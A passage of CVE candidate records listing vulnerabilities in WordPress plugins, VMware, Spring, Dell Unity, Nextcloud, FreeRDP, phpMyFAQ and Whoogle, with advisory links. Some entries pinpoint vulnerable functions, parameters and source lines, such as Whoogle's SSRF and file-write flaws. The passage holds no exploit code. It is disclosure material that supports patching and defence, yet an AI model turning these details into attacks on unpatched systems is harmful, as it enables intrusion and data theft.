CVE 2024 22285 Candidate Cross-Site Request Forgery (CSRF) vulnerability in Elise Bosse Frontpage Manager.This issue affects Frontpage Manager: from n/a through 1.3. MISC:https://patchstack.com/database/vulnerability/frontpage-manager/wordpress-frontpage-manager-plugin-1-3-cross-site-request-forgery-csrf-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/frontpage-manager/wordpress-frontpage-manager-plugin-1-3-cross-site-request-forgery-csrf-vulnerability?_s_id=cve Assigned (20240108)
CVE 2024 22284 Candidate Deserialization of Untrusted Data vulnerability in Thomas Belser Asgaros Forum.This issue affects Asgaros Forum: from n/a through 2.7.2. MISC:https://patchstack.com/database/vulnerability/asgaros-forum/wordpress-asgaros-forum-plugin-2-7-2-php-object-injection-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/asgaros-forum/wordpress-asgaros-forum-plugin-2-7-2-php-object-injection-vulnerability?_s_id=cve Assigned (20240108)
CVE 2024 22283 Candidate Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Delhivery Delhivery Logistics Courier.This issue affects Delhivery Logistics Courier: from n/a through 1.0.107. MISC:https://patchstack.com/database/vulnerability/delhivery-logistics-courier/wordpress-delhivery-logistics-courier-plugin-1-0-107-subscriber-sql-injection-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/delhivery-logistics-courier/wordpress-delhivery-logistics-courier-plugin-1-0-107-subscriber-sql-injection-vulnerability?_s_id=cve Assigned (20240108)
CVE 2024 22282 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Michael Torbert SimpleMap Store Locator allows Reflected XSS.This issue affects SimpleMap Store Locator: from n/a through 2.6.1. MISC:https://patchstack.com/database/vulnerability/simplemap/wordpress-simplemap-store-locator-plugin-2-6-1-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/simplemap/wordpress-simplemap-store-locator-plugin-2-6-1-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240108)
CVE 2024 2228 Candidate This vulnerability allows an authenticated user to perform a Lifecycle Manager flow or other QuickLink for a target user outside of the defined QuickLink Population. MISC:https://www.sailpoint.com/security-advisories/ | URL:https://www.sailpoint.com/security-advisories/ Assigned (20240306)
CVE 2024 2227 Candidate This vulnerability allows access to arbitrary files in the application server file system due to a path traversal vulnerability in JavaServer Faces (JSF) 2.2.20 documented in CVE-2020-6950. The remediation for this vulnerability contained in this security fix provides additional changes to the remediation announced in May 2021 tracked by ETN IIQSAW-3585 and January 2024 tracked by IIQFW-336. This vulnerability in IdentityIQ is assigned CVE-2024-2227. MISC:https://www.sailpoint.com/security-advisories/ | URL:https://www.sailpoint.com/security-advisories/ Assigned (20240306)
CVE 2024 22259 Candidate Applications that use UriComponentsBuilder in Spring Framework to parse an externally provided URL (e.g. through a query parameter) AND perform validation checks on the host of the parsed URL may be vulnerable to a open redirect https://cwe.mitre.org/data/definitions/601.html attack or to a SSRF attack if the URL is used after passing validation checks. This is the same as CVE-2024-22243 https://spring.io/security/cve-2024-22243 , but with different input. MISC:https://spring.io/security/cve-2024-22259 | URL:https://spring.io/security/cve-2024-22259 Assigned (20240108)
CVE 2024 22258 Candidate Spring Authorization Server versions 1.0.0 - 1.0.5, 1.1.0 - 1.1.5, 1.2.0 - 1.2.2 and older unsupported versions are susceptible to a PKCE Downgrade Attack for Confidential Clients. Specifically, an application is vulnerable when a Confidential Client uses PKCE for the Authorization Code Grant. An application is not vulnerable when a Public Client uses PKCE for the Authorization Code Grant. MISC:https://spring.io/security/cve-2024-22258 | URL:https://spring.io/security/cve-2024-22258 Assigned (20240108)
CVE 2024 22257 Candidate In Spring Security, versions 5.7.x prior to 5.7.12, 5.8.x prior to 5.8.11, versions 6.0.x prior to 6.0.9, versions 6.1.x prior to 6.1.8, versions 6.2.x prior to 6.2.3, an application is possible vulnerable to broken access control when it directly uses the AuthenticatedVoter#vote passing a null Authentication parameter. MISC:https://spring.io/security/cve-2024-22257 | URL:https://spring.io/security/cve-2024-22257 Assigned (20240108)
CVE 2024 22256 Candidate VMware Cloud Director contains a partial information disclosure vulnerability. A malicious actor can potentially gather information about organization names based on the behavior of the instance. MISC:https://www.vmware.com/security/advisories/VMSA-2024-0007.html | URL:https://www.vmware.com/security/advisories/VMSA-2024-0007.html Assigned (20240108)
CVE 2024 22255 Candidate VMware ESXi, Workstation, and Fusion contain an information disclosure vulnerability in the UHCI USB controller. A malicious actor with administrative access to a virtual machine may be able to exploit this issue to leak memory from the vmx process. MISC:https://www.vmware.com/security/advisories/VMSA-2024-0006.html | URL:https://www.vmware.com/security/advisories/VMSA-2024-0006.html Assigned (20240108)
CVE 2024 22254 Candidate VMware ESXi contains an out-of-bounds write vulnerability. A malicious actor with privileges within the VMX process may trigger an out-of-bounds write leading to an escape of the sandbox. MISC:https://www.vmware.com/security/advisories/VMSA-2024-0006.html | URL:https://www.vmware.com/security/advisories/VMSA-2024-0006.html Assigned (20240108)
CVE 2024 22253 Candidate VMware ESXi, Workstation, and Fusion contain a use-after-free vulnerability in the UHCI USB controller. A malicious actor with local administrative privileges on a virtual machine may exploit this issue to execute code as the virtual machine's VMX process running on the host. On ESXi, the exploitation is contained within the VMX sandbox whereas, on Workstation and Fusion, this may lead to code execution on the machine where Workstation or Fusion is installed. MISC:https://www.vmware.com/security/advisories/VMSA-2024-0006.html | URL:https://www.vmware.com/security/advisories/VMSA-2024-0006.html Assigned (20240108)
CVE 2024 22252 Candidate VMware ESXi, Workstation, and Fusion contain a use-after-free vulnerability in the XHCI USB controller. A malicious actor with local administrative privileges on a virtual machine may exploit this issue to execute code as the virtual machine's VMX process running on the host. On ESXi, the exploitation is contained within the VMX sandbox whereas, on Workstation and Fusion, this may lead to code execution on the machine where Workstation or Fusion is installed. MISC:https://www.vmware.com/security/advisories/VMSA-2024-0006.html | URL:https://www.vmware.com/security/advisories/VMSA-2024-0006.html Assigned (20240108)
CVE 2024 22251 Candidate VMware Workstation and Fusion contain an out-of-bounds read vulnerability in the USB CCID (chip card interface device). A malicious actor with local administrative privileges on a virtual machine may trigger an out-of-bounds read leading to information disclosure. MISC:https://www.vmware.com/security/advisories/VMSA-2024-0005.html | URL:https://www.vmware.com/security/advisories/VMSA-2024-0005.html Assigned (20240108)
CVE 2024 22250 Candidate Session Hijack vulnerability in Deprecated VMware Enhanced Authentication Plug-in could allow a malicious actor with unprivileged local access to a windows operating system can hijack a privileged EAP session when initiated by a privileged domain user on the same system. MISC:https://www.vmware.com/security/advisories/VMSA-2024-0003.html | URL:https://www.vmware.com/security/advisories/VMSA-2024-0003.html Assigned (20240108)
CVE 2024 22245 Candidate Arbitrary Authentication Relay and Session Hijack vulnerabilities in the deprecated VMware Enhanced Authentication Plug-in (EAP) could allow a malicious actor that could trick a target domain user with EAP installed in their web browser into requesting and relaying service tickets for arbitrary Active Directory Service Principal Names (SPNs). MISC:https://www.vmware.com/security/advisories/VMSA-2024-0003.html | URL:https://www.vmware.com/security/advisories/VMSA-2024-0003.html Assigned (20240108)
CVE 2024 22243 Candidate Applications that use UriComponentsBuilder to parse an externally provided URL (e.g. through a query parameter) AND perform validation checks on the host of the parsed URL may be vulnerable to a open redirect https://cwe.mitre.org/data/definitions/601.html attack or to a SSRF attack if the URL is used after passing validation checks. MISC:https://spring.io/security/cve-2024-22243 | URL:https://spring.io/security/cve-2024-22243 Assigned (20240108)
CVE 2024 22241 Candidate Aria Operations for Networks contains a cross site scripting vulnerability. A malicious actor with admin privileges can inject a malicious payload into the login banner and takeover the user account. MISC:https://www.vmware.com/security/advisories/VMSA-2024-0002.html | URL:https://www.vmware.com/security/advisories/VMSA-2024-0002.html Assigned (20240108)
CVE 2024 22240 Candidate Aria Operations for Networks contains a local file read vulnerability. A malicious actor with admin privileges may exploit this vulnerability leading to unauthorized access to sensitive information. MISC:https://www.vmware.com/security/advisories/VMSA-2024-0002.html | URL:https://www.vmware.com/security/advisories/VMSA-2024-0002.html Assigned (20240108)
CVE 2024 22239 Candidate Aria Operations for Networks contains a local privilege escalation vulnerability. A console user with access to Aria Operations for Networks may exploit this vulnerability to escalate privileges to gain regular shell access. MISC:https://www.vmware.com/security/advisories/VMSA-2024-0002.html | URL:https://www.vmware.com/security/advisories/VMSA-2024-0002.html Assigned (20240108)
CVE 2024 22238 Candidate Aria Operations for Networks contains a cross site scripting vulnerability. A malicious actor with admin privileges may be able to inject malicious code into user profile configurations due to improper input sanitization. MISC:https://www.vmware.com/security/advisories/VMSA-2024-0002.html | URL:https://www.vmware.com/security/advisories/VMSA-2024-0002.html Assigned (20240108)
CVE 2024 22237 Candidate Aria Operations for Networks contains a local privilege escalation vulnerability. A console user with access to Aria Operations for Networks may exploit this vulnerability to escalate privileges to gain root access to the system. MISC:https://www.vmware.com/security/advisories/VMSA-2024-0002.html | URL:https://www.vmware.com/security/advisories/VMSA-2024-0002.html Assigned (20240108)
CVE 2024 22236 Candidate In Spring Cloud Contract, versions 4.1.x prior to 4.1.1, versions 4.0.x prior to 4.0.5, and versions 3.1.x prior to 3.1.10, test execution is vulnerable to local information disclosure via temporary directory created with unsafe permissions through the shaded com.google.guava:guava dependency in the org.springframework.cloud:spring-cloud-contract-shade dependency. MISC:https://spring.io/security/cve-2024-22236 | URL:https://spring.io/security/cve-2024-22236 Assigned (20240108)
CVE 2024 22235 Candidate VMware Aria Operations contains a local privilege escalation vulnerability. A malicious actor with administrative access to the local system can escalate privileges to 'root'. MISC:https://www.vmware.com/security/advisories/VMSA-2024-0004.html | URL:https://www.vmware.com/security/advisories/VMSA-2024-0004.html Assigned (20240108)
CVE 2024 22234 Candidate In Spring Security, versions 6.1.x prior to 6.1.7 and versions 6.2.x prior to 6.2.2, an application is vulnerable to broken access control when it directly uses the AuthenticationTrustResolver.isFullyAuthenticated(Authentication) method. Specifically, an application is vulnerable if: * The application uses AuthenticationTrustResolver.isFullyAuthenticated(Authentication) directly and a null authentication parameter is passed to it resulting in an erroneous true return value. An application is not vulnerable if any of the following is true: * The application does not use AuthenticationTrustResolver.isFullyAuthenticated(Authentication) directly. * The application does not pass null to AuthenticationTrustResolver.isFullyAuthenticated * The application only uses isFullyAuthenticated via Method Security https://docs.spring.io/spring-security/reference/servlet/authorization/method-security.html or HTTP Request Security https://docs.spring.io/spring-security/reference/servlet/authorization/authorize-http-requests.html CONFIRM:https://security.netapp.com/advisory/ntap-20240315-0003/ | MISC:https://spring.io/security/cve-2024-22234 | URL:https://spring.io/security/cve-2024-22234 Assigned (20240108)
CVE 2024 22233 Candidate In Spring Framework versions 6.0.15 and 6.1.2, it is possible for a user to provide specially crafted HTTP requests that may cause a denial-of-service (DoS) condition. Specifically, an application is vulnerable when all of the following are true: * the application uses Spring MVC * Spring Security 6.1.6+ or 6.2.1+ is on the classpath Typically, Spring Boot applications need the org.springframework.boot:spring-boot-starter-web and org.springframework.boot:spring-boot-starter-security dependencies to meet all conditions. MISC:https://spring.io/security/cve-2024-22233/ | URL:https://spring.io/security/cve-2024-22233/ Assigned (20240108)
CVE 2024 22230 Candidate Dell Unity, versions prior to 5.4, contains a Cross-site scripting vulnerability. An authenticated attacker could potentially exploit this vulnerability, stealing session information, masquerading as the affected user or carry out any actions that this user could perform, or to generally control the victim's browser. MISC:https://www.dell.com/support/kbdoc/en-us/000222010/dsa-2024-042-dell-unity-dell-unity-vsa-and-dell-unity-xt-security-update-for-multiple-vulnerabilities | URL:https://www.dell.com/support/kbdoc/en-us/000222010/dsa-2024-042-dell-unity-dell-unity-vsa-and-dell-unity-xt-security-update-for-multiple-vulnerabilities Assigned (20240108)
CVE 2024 22229 Candidate Dell Unity, versions prior to 5.4, contain a vulnerability whereby log messages can be spoofed by an authenticated attacker. An attacker could exploit this vulnerability to forge log entries, create false alarms, and inject malicious content into logs that compromise logs integrity. A malicious attacker could also prevent the product from logging information while malicious actions are performed or implicate an arbitrary user for malicious activities. MISC:https://www.dell.com/support/kbdoc/en-us/000213152/dsa-2023-141-dell-unity-unity-vsa-and-unity-xt-security-update-for-multiple-vulnerabilities | URL:https://www.dell.com/support/kbdoc/en-us/000213152/dsa-2023-141-dell-unity-unity-vsa-and-unity-xt-security-update-for-multiple-vulnerabilities Assigned (20240108)
CVE 2024 22228 Candidate Dell Unity, versions prior to 5.4, contains an OS Command Injection Vulnerability in its svc_cifssupport utility. An authenticated attacker could potentially exploit this vulnerability, escaping the restricted shell and execute arbitrary operating system commands with root privileges. MISC:https://www.dell.com/support/kbdoc/en-us/000222010/dsa-2024-042-dell-unity-dell-unity-vsa-and-dell-unity-xt-security-update-for-multiple-vulnerabilities | URL:https://www.dell.com/support/kbdoc/en-us/000222010/dsa-2024-042-dell-unity-dell-unity-vsa-and-dell-unity-xt-security-update-for-multiple-vulnerabilities Assigned (20240108)
CVE 2024 22227 Candidate Dell Unity, versions prior to 5.4, contains an OS Command Injection Vulnerability in its svc_dc utility. An authenticated attacker could potentially exploit this vulnerability, leading to the ability execute commands with root privileges. MISC:https://www.dell.com/support/kbdoc/en-us/000222010/dsa-2024-042-dell-unity-dell-unity-vsa-and-dell-unity-xt-security-update-for-multiple-vulnerabilities | URL:https://www.dell.com/support/kbdoc/en-us/000222010/dsa-2024-042-dell-unity-dell-unity-vsa-and-dell-unity-xt-security-update-for-multiple-vulnerabilities Assigned (20240108)
CVE 2024 22226 Candidate Dell Unity, versions prior to 5.4, contain a path traversal vulnerability in its svc_supportassist utility. An authenticated attacker could potentially exploit this vulnerability, to gain unauthorized write access to the files stored on the server filesystem, with elevated privileges. MISC:https://www.dell.com/support/kbdoc/en-us/000222010/dsa-2024-042-dell-unity-dell-unity-vsa-and-dell-unity-xt-security-update-for-multiple-vulnerabilities | URL:https://www.dell.com/support/kbdoc/en-us/000222010/dsa-2024-042-dell-unity-dell-unity-vsa-and-dell-unity-xt-security-update-for-multiple-vulnerabilities Assigned (20240108)
CVE 2024 22225 Candidate Dell Unity, versions prior to 5.4, contains an OS Command Injection Vulnerability in its svc_supportassist utility. An authenticated attacker could potentially exploit this vulnerability, leading to execution of arbitrary operating system commands with root privileges. MISC:https://www.dell.com/support/kbdoc/en-us/000222010/dsa-2024-042-dell-unity-dell-unity-vsa-and-dell-unity-xt-security-update-for-multiple-vulnerabilities | URL:https://www.dell.com/support/kbdoc/en-us/000222010/dsa-2024-042-dell-unity-dell-unity-vsa-and-dell-unity-xt-security-update-for-multiple-vulnerabilities Assigned (20240108)
CVE 2024 22224 Candidate Dell Unity, versions prior to 5.4, contains an OS Command Injection Vulnerability in its svc_nas utility. An authenticated attacker could potentially exploit this vulnerability, escaping the restricted shell and execute arbitrary operating system commands with root privileges. MISC:https://www.dell.com/support/kbdoc/en-us/000222010/dsa-2024-042-dell-unity-dell-unity-vsa-and-dell-unity-xt-security-update-for-multiple-vulnerabilities | URL:https://www.dell.com/support/kbdoc/en-us/000222010/dsa-2024-042-dell-unity-dell-unity-vsa-and-dell-unity-xt-security-update-for-multiple-vulnerabilities Assigned (20240108)
CVE 2024 22223 Candidate Dell Unity, versions prior to 5.4, contains an OS Command Injection Vulnerability within its svc_cbr utility. An authenticated malicious user with local access could potentially exploit this vulnerability, leading to the execution of arbitrary OS commands on the application's underlying OS, with the privileges of the vulnerable application. MISC:https://www.dell.com/support/kbdoc/en-us/000222010/dsa-2024-042-dell-unity-dell-unity-vsa-and-dell-unity-xt-security-update-for-multiple-vulnerabilities | URL:https://www.dell.com/support/kbdoc/en-us/000222010/dsa-2024-042-dell-unity-dell-unity-vsa-and-dell-unity-xt-security-update-for-multiple-vulnerabilities Assigned (20240108)
CVE 2024 22222 Candidate Dell Unity, versions prior to 5.4, contains an OS Command Injection Vulnerability within its svc_udoctor utility. An authenticated malicious user with local access could potentially exploit this vulnerability, leading to the execution of arbitrary OS commands on the application's underlying OS, with the privileges of the vulnerable application. MISC:https://www.dell.com/support/kbdoc/en-us/000222010/dsa-2024-042-dell-unity-dell-unity-vsa-and-dell-unity-xt-security-update-for-multiple-vulnerabilities | URL:https://www.dell.com/support/kbdoc/en-us/000222010/dsa-2024-042-dell-unity-dell-unity-vsa-and-dell-unity-xt-security-update-for-multiple-vulnerabilities Assigned (20240108)
CVE 2024 22221 Candidate Dell Unity, versions prior to 5.4, contains SQL Injection vulnerability. An authenticated attacker could potentially exploit this vulnerability, leading to exposure of sensitive information. MISC:https://www.dell.com/support/kbdoc/en-us/000222010/dsa-2024-042-dell-unity-dell-unity-vsa-and-dell-unity-xt-security-update-for-multiple-vulnerabilities | URL:https://www.dell.com/support/kbdoc/en-us/000222010/dsa-2024-042-dell-unity-dell-unity-vsa-and-dell-unity-xt-security-update-for-multiple-vulnerabilities Assigned (20240108)
CVE 2024 22220 Candidate An issue was discovered in Terminalfour 7.4 through 7.4.0004 QP3 and 8 through 8.3.19, and Formbank through 2.1.10-FINAL. Unauthenticated Stored Cross-Site Scripting can occur, with resultant Admin Session Hijacking. The attack vectors are Form Builder and Form Preview. MISC:https://docs.terminalfour.com/articles/release-notes-highlights/ | MISC:https://docs.terminalfour.com/release-notes/security-notices/cve-2024-22220/ Assigned (20240108)
CVE 2024 22216 Candidate In default installations of Microchip maxView Storage Manager (for Adaptec Smart Storage Controllers) where Redfish server is configured for remote system management, unauthorized access can occur, with data modification and information disclosure. This affects 3.00.23484 through 4.14.00.26064 (except for the patched versions 3.07.23980 and 4.07.00.25339). MISC:https://www.microchip.com/en-us/solutions/embedded-security/how-to-report-potential-product-security-vulnerabilities/maxview-storage-manager-redfish-server-vulnerability | URL:https://www.microchip.com/en-us/solutions/embedded-security/how-to-report-potential-product-security-vulnerabilities/maxview-storage-manager-redfish-server-vulnerability Assigned (20240108)
CVE 2024 22213 Candidate Deck is a kanban style organization tool aimed at personal planning and project organization for teams integrated with Nextcloud. In affected versions users could be tricked into executing malicious code that would execute in their browser via HTML sent as a comment. It is recommended that the Nextcloud Deck is upgraded to version 1.9.5 or 1.11.2. There are no known workarounds for this vulnerability. MISC:https://github.com/nextcloud/deck/commit/91f1557362047f8840f53151f176b80148650bcd | URL:https://github.com/nextcloud/deck/commit/91f1557362047f8840f53151f176b80148650bcd | MISC:https://github.com/nextcloud/security-advisories/security/advisories/GHSA-mg7w-x9fm-9wwc | URL:https://github.com/nextcloud/security-advisories/security/advisories/GHSA-mg7w-x9fm-9wwc | MISC:https://hackerone.com/reports/2058556 | URL:https://hackerone.com/reports/2058556 Assigned (20240108)
CVE 2024 22212 Candidate Nextcloud Global Site Selector is a tool which allows you to run multiple small Nextcloud instances and redirect users to the right server. A problem in the password verification method allows an attacker to authenticate as another user. It is recommended that the Nextcloud Global Site Selector is upgraded to version 1.4.1, 2.1.2, 2.3.4 or 2.4.5. There are no known workarounds for this issue. MISC:https://github.com/nextcloud/globalsiteselector/commit/ab5da57190d5bbc79079ce4109b6bcccccd893ee | URL:https://github.com/nextcloud/globalsiteselector/commit/ab5da57190d5bbc79079ce4109b6bcccccd893ee | MISC:https://github.com/nextcloud/security-advisories/security/advisories/GHSA-vj5q-f63m-wp77 | URL:https://github.com/nextcloud/security-advisories/security/advisories/GHSA-vj5q-f63m-wp77 | MISC:https://hackerone.com/reports/2248689 | URL:https://hackerone.com/reports/2248689 Assigned (20240108)
CVE 2024 22211 Candidate FreeRDP is a set of free and open source remote desktop protocol library and clients. In affected versions an integer overflow in `freerdp_bitmap_planar_context_reset` leads to heap-buffer overflow. This affects FreeRDP based clients. FreeRDP based server implementations and proxy are not affected. A malicious server could prepare a `RDPGFX_RESET_GRAPHICS_PDU` to allocate too small buffers, possibly triggering later out of bound read/write. Data extraction over network is not possible, the buffers are used to display an image. This issue has been addressed in version 2.11.5 and 3.2.0. Users are advised to upgrade. there are no know workarounds for this vulnerability. FEDORA:FEDORA-2024-01689e51e5 | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PIQE3YSPOJPAUS7DPWIBTR5IQSQX35VM/ | FEDORA:FEDORA-2024-f294ddb7fb | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/44VOA5KQQT7KQPW7CLST4Y4SQTKK3IOU/ | MISC:https://github.com/FreeRDP/FreeRDP/commit/939e922936e9c3ae8fc204968645e5e7563a2fff | URL:https://github.com/FreeRDP/FreeRDP/commit/939e922936e9c3ae8fc204968645e5e7563a2fff | MISC:https://github.com/FreeRDP/FreeRDP/commit/aeac3040cc99eeaff1e1171a822114c857b9dca9 | URL:https://github.com/FreeRDP/FreeRDP/commit/aeac3040cc99eeaff1e1171a822114c857b9dca9 | MISC:https://github.com/FreeRDP/FreeRDP/security/advisories/GHSA-rjhp-44rv-7v59 | URL:https://github.com/FreeRDP/FreeRDP/security/advisories/GHSA-rjhp-44rv-7v59 Assigned (20240108)
CVE 2024 22209 Candidate Open edX Platform is a service-oriented platform for authoring and delivering online learning. A user with a JWT and more limited scopes could call endpoints exceeding their access. This vulnerability has been patched in commit 019888f. MISC:https://github.com/openedx/edx-platform/blob/0b3e4d73b6fb6f41ae87cf2b77bca12052ee1ac8/lms/djangoapps/courseware/block_render.py#L752-L775 | URL:https://github.com/openedx/edx-platform/blob/0b3e4d73b6fb6f41ae87cf2b77bca12052ee1ac8/lms/djangoapps/courseware/block_render.py#L752-L775 | MISC:https://github.com/openedx/edx-platform/commit/019888f3d15beaebcb7782934f6c43b0c2b3735e | URL:https://github.com/openedx/edx-platform/commit/019888f3d15beaebcb7782934f6c43b0c2b3735e | MISC:https://github.com/openedx/edx-platform/security/advisories/GHSA-qx8m-mqx3-j9fm | URL:https://github.com/openedx/edx-platform/security/advisories/GHSA-qx8m-mqx3-j9fm Assigned (20240108)
CVE 2024 22208 Candidate phpMyFAQ is an Open Source FAQ web application for PHP 8.1+ and MySQL, PostgreSQL and other databases. The 'sharing FAQ' functionality allows any unauthenticated actor to misuse the phpMyFAQ application to send arbitrary emails to a large range of targets. The phpMyFAQ application has a functionality where anyone can share a FAQ item to others. The front-end of this functionality allows any phpMyFAQ articles to be shared with 5 email addresses. Any unauthenticated actor can perform this action. There is a CAPTCHA in place, however the amount of people you email with a single request is not limited to 5 by the backend. An attacker can thus solve a single CAPTCHA and send thousands of emails at once. An attacker can utilize the target application's email server to send phishing messages. This can get the server on a blacklist, causing all emails to end up in spam. It can also lead to reputation damages. This issue has been patched in version 3.2.5. MISC:https://github.com/thorsten/phpMyFAQ/commit/a34d94ab7b1be9256a9ef898f18ea6bfb63f6f1e | URL:https://github.com/thorsten/phpMyFAQ/commit/a34d94ab7b1be9256a9ef898f18ea6bfb63f6f1e | MISC:https://github.com/thorsten/phpMyFAQ/security/advisories/GHSA-9hhf-xmcw-r3xg | URL:https://github.com/thorsten/phpMyFAQ/security/advisories/GHSA-9hhf-xmcw-r3xg Assigned (20240108)
CVE 2024 22207 Candidate fastify-swagger-ui is a Fastify plugin for serving Swagger UI. Prior to 2.1.0, the default configuration of `@fastify/swagger-ui` without `baseDir` set will lead to all files in the module's directory being exposed via http routes served by the module. The vulnerability is fixed in v2.1.0. Setting the `baseDir` option can also work around this vulnerability. CONFIRM:https://security.netapp.com/advisory/ntap-20240216-0002/ | MISC:https://github.com/fastify/fastify-swagger-ui/commit/13d799a2c5f14d3dd5b15892e03bbcbae63ee6f7 | URL:https://github.com/fastify/fastify-swagger-ui/commit/13d799a2c5f14d3dd5b15892e03bbcbae63ee6f7 | MISC:https://github.com/fastify/fastify-swagger-ui/security/advisories/GHSA-62jr-84gf-wmg4 | URL:https://github.com/fastify/fastify-swagger-ui/security/advisories/GHSA-62jr-84gf-wmg4 Assigned (20240108)
CVE 2024 22206 Candidate Clerk helps developers build user management. Unauthorized access or privilege escalation due to a logic flaw in auth() in the App Router or getAuth() in the Pages Router. This vulnerability was patched in version 4.29.3. MISC:https://clerk.com/changelog/2024-01-12 | URL:https://clerk.com/changelog/2024-01-12 | MISC:https://github.com/clerk/javascript/releases/tag/%40clerk%2Fnextjs%404.29.3 | URL:https://github.com/clerk/javascript/releases/tag/%40clerk%2Fnextjs%404.29.3 | MISC:https://github.com/clerk/javascript/security/advisories/GHSA-q6w5-jg5q-47vg | URL:https://github.com/clerk/javascript/security/advisories/GHSA-q6w5-jg5q-47vg Assigned (20240108)
CVE 2024 22205 Candidate Whoogle Search is a self-hosted metasearch engine. In versions 0.8.3 and prior, the `window` endpoint does not sanitize user-supplied input from the `location` variable and passes it to the `send` method which sends a `GET` request on lines 339-343 in `request.py,` which leads to a server-side request forgery. This issue allows for crafting GET requests to internal and external resources on behalf of the server. For example, this issue would allow for accessing resources on the internal network that the server has access to, even though these resources may not be accessible on the internet. This issue is fixed in version 0.8.4. MISC:https://github.com/benbusby/whoogle-search/blob/92e8ede24e9277a5440d403f75877209f1269884/app/request.py#L339-L343 | URL:https://github.com/benbusby/whoogle-search/blob/92e8ede24e9277a5440d403f75877209f1269884/app/request.py#L339-L343 | MISC:https://github.com/benbusby/whoogle-search/blob/92e8ede24e9277a5440d403f75877209f1269884/app/routes.py#L479 | URL:https://github.com/benbusby/whoogle-search/blob/92e8ede24e9277a5440d403f75877209f1269884/app/routes.py#L479 | MISC:https://github.com/benbusby/whoogle-search/blob/92e8ede24e9277a5440d403f75877209f1269884/app/routes.py#L496-L557 | URL:https://github.com/benbusby/whoogle-search/blob/92e8ede24e9277a5440d403f75877209f1269884/app/routes.py#L496-L557 | MISC:https://github.com/benbusby/whoogle-search/blob/92e8ede24e9277a5440d403f75877209f1269884/app/routes.py#L497 | URL:https://github.com/benbusby/whoogle-search/blob/92e8ede24e9277a5440d403f75877209f1269884/app/routes.py#L497 | MISC:https://github.com/benbusby/whoogle-search/commit/3a2e0b262e4a076a20416b45e6b6f23fd265aeda | URL:https://github.com/benbusby/whoogle-search/commit/3a2e0b262e4a076a20416b45e6b6f23fd265aeda | MISC:https://securitylab.github.com/advisories/GHSL-2023-186_GHSL-2023-189_benbusby_whoogle-search/ | URL:https://securitylab.github.com/advisories/GHSL-2023-186_GHSL-2023-189_benbusby_whoogle-search/ Assigned (20240108)
CVE 2024 22204 Candidate Whoogle Search is a self-hosted metasearch engine. Versions 0.8.3 and prior have a limited file write vulnerability when the configuration options in Whoogle are enabled. The `config` function in `app/routes.py` does not validate the user-controlled `name` variable on line 447 and `config_data` variable on line 437. The `name` variable is insecurely concatenated in `os.path.join`, leading to path manipulation. The POST data from the `config_data` variable is saved with `pickle.dump` which leads to a limited file write. However, the data that is saved is earlier transformed into a dictionary and the `url` key value pair is added before the file is saved on the system. All in all, the issue allows us to save and overwrite files on the system that the application has permissions to, with a dictionary containing arbitrary data and the `url` key value, which is a limited file write. Version 0.8.4 contains a patch for this issue. MISC:https://github.com/benbusby/whoogle-search/blob/92e8ede24e9277a5440d403f75877209f1269884/app/routes.py#L419-L452 | URL:https://github.com/benbusby/whoogle-search/blob/92e8ede24e9277a5440d403f75877209f1269884/app/routes.py#L419-L452 | MISC:https://github.com/benbusby/whoogle-search/blob/92e8ede24e9277a5440d403f75877209f1269884/app/routes.py#L437 | URL:https://github.com/benbusby/whoogle-search/blob/92e8ede24e9277a5440d403f75877209f1269884/app/routes.py#L437 | MISC:https://github.com/benbusby/whoogle-search/blob/92e8ede24e9277a5440d403f75877209f1269884/app/routes.py#L444 | URL:https://github.com/benbusby/whoogle-search/blob/92e8ede24e9277a5440d403f75877209f1269884/app/routes.py#L444 | MISC:https://github.com/benbusby/whoogle-search/blob/92e8ede24e9277a5440d403f75877209f1269884/app/routes.py#L447 | URL:https://github.com/benbusby/whoogle-search/blob/92e8ede24e9277a5440d403f75877209f1269884/app/routes.py#L447 | MISC:https://github.com/benbusby/whoogle-search/commit/3a2e0b262e4a076a20416b45e6b6f23fd265aeda | URL:https://github.com/benbusby/whoogle-search/commit/3a2e0b262e4a076a20416b45e6b6f23fd265aeda | MISC:https://securitylab.github.com/advisories/GHSL-2023-186_GHSL-2023-189_benbusby_whoogle-search/ | URL:https://securitylab.github.com/advisories/GHSL-2023-186_GHSL-2023-189_benbusby_whoogle-search/ Assigned (20240108)
CVE 2024 22203 Candidate Whoogle Search is a self-hosted metasearch engine. In versions prior to 0.8.4, the `element` method in `app/routes.py` does not validate the user-controlled `src_type` and `element_url` variables and passes them to the `send` method which sends a GET request on lines 339-343 in `request.py`, which leads to a server-side request forgery. This issue allows for crafting GET requests to internal and external resources on behalf of the server. For example, this issue would allow for accessing resources on the internal network that the server has access to, even though these resources may not be accessible on the internet. This issue is fixed in version 0.8.4. MISC:https://github.com/benbusby/whoogle-search/blob/92e8ede24e9277a5440d403f75877209f1269884/app/request.py#L339-L343 | URL:https://github.com/benbusby/whoogle-search/blob/92e8ede24e9277a5440d403f75877209f1269884/app/request.py#L339-L343 | MISC:https://github.com/benbusby/whoogle-search/blob/92e8ede24e9277a5440d403f75877209f1269884/app/routes.py#L465-L490 | URL:https://github.com/benbusby/whoogle-search/blob/92e8ede24e9277a5440d403f75877209f1269884/app/routes.py#L465-L490 | MISC:https://github.com/benbusby/whoogle-search/blob/92e8ede24e9277a5440d403f75877209f1269884/app/routes.py#L466 | URL:https://github.com/benbusby/whoogle-search/blob/92e8ede24e9277a5440d403f75877209f1269884/app/routes.py#L466 | MISC:https://github.com/benbusby/whoogle-search/blob/92e8ede24e9277a5440d403f75877209f1269884/app/routes.py#L476 | URL:https://github.com/benbusby/whoogle-search/blob/92e8ede24e9277a5440d403f75877209f1269884/app/routes.py#L476 | MISC:https://github.com/benbusby/whoogle-search/blob/92e8ede24e9277a5440d403f75877209f1269884/app/routes.py#L479 | URL:https://github.com/benbusby/whoogle-search/blob/92e8ede24e9277a5440d403f75877209f1269884/app/routes.py#L479 | MISC:https://github.com/benbusby/whoogle-search/commit/3a2e0b262e4a076a20416b45e6b6f23fd265aeda | 